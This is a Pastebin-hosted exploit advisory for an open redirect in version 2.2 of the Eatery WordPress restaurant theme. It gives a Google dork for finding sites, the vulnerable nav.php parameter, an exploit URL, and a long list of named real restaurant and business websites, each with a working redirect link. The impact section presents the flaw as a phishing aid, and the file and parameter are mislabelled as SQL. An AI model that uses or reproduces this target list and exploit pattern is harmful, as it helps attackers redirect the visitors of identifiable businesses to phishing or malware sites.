Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress Eatery Restaurant Themes 2.2 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 25/03/2020
- # Vendor Homepage : themovation.com/eatery
- # Software Link : themesinfo.com/eatery-wordpress-restaurant-theme-ycm
- themeforest.net/item/eatery-responsive-restaurant-wordpress-theme/3469316?s_rank=7
- # Software Version : 2.2
- # Software Price : 49 $
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dork : inurl:/wp-content/themes/eatery/
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Software Information :
- ***********************
- Eatery is a premium Restaurant WordPress theme created for restaurants and cafés.
- It features a very clean, responsive design that is perfect for creating a professional image of
- your restaurant or business. It’s easy to customize with awesome features (like food menus and events!)
- and has plenty of easy to use shortcodes and tools. Eatery is also fully compatible with WPML –
- The WordPress Multilingual Plugin.
- ####################################################################
- # Impact :
- ***********
- WordPress Eatery Restaurant Themes 2.2 accepts a user-controlled input that specifies
- a link to an external site, and uses that link in a Redirect. This simplifies phishing
- attacks. An http parameter may contain a URL value and could cause the web
- application to redirect the request to the specified URL. By modifying the URL
- value to a malicious site, an attacker may successfully launch a phishing scam and
- steal user credentials. Because the server name in the modified link is identical to the
- original site, phishing attempts have a more trustworthy appearance. Open redirect is a
- failure in that process that makes it possible for attackers to steer users to malicious
- websites. This vulnerability is used in phishing attacks to get users to visit malicious
- sites without realizing it. Web users often encounter redirection when they visit the
- Web site of a company whose name has been changed or which has been acquired by
- another company. Visiting unreal web page user's computer becomes affected
- by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # SQL Vulnerable File :
- ***********************
- /nav.php
- # SQL Vulnerable Parameter :
- ****************************
- ?-Menu-=
- # Open Redirection Exploit :
- **************************
- /wp-content/themes/eatery/nav.php?-Menu-=[http://www.REDIRECTADDRESS.gov]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] nacocentral.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] thebayousmokehouse.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] cutsteakhouse.com.au/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] relaxcafe.net/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] charliesrestaurantstafford.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] districtaustin.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] gharerkhabar.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] hhc.burry.webfactional.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] alcrostino.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] kyotomke.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] bluesurfcafe.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] dominicks-pizza.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] robsox.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] dillysdeli.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] cazpizza.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] pedrettisbakery.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] philsicehouse.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] saffroncafeindy.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] mediterraneanrestaurant.co.uk/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] topesrestaurant.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] erlingsvariety.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] demo.themovation.com/eatery/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] nancyscafeandcatering.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] lokantaci.at/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] iluvphofrisco.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] n9.home.pl/calanaprzod_new/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] giappone.rlfc.pt/maisonjabbour.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] barsantamaria.com.ar/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] hostingarea51.com.ar/c/elespanolrestaurant/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] bengalspicerestaurant.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] angeloandfriends.eu/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] traiteurantillaisblaye.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] boishakhirestaurant.co.uk/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] detweewilgen.nl/wordpress/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] parvisdelabattoir.be/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] angelopizzerie.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] anticaosteriadellapeppina.it/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] splidholm-hundepension.dk/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] arlecchino-waterloo.be/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] currywithlove.no/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] gasthof-muhr.at/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] karadeniz.jp/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] la-botte.at/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] bulwar-cafe.pl/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] dynamicair.qualitecnica.pt/restorantaverna.me/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] alessandroeller.com.br/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] osteriadel32.it/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] la-cosa.eu/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] ravintolathalassa.fi/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] dolcesperanza.com.br/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] ancienbruxelles.be/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] a-vi-mam-di-fr.2.restofactory.com/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] ilcanniccio.be/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- [+] larosedessablesmons.be/wp-content/themes/eatery/nav.php?-Menu-=https://cxsecurity.com/
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment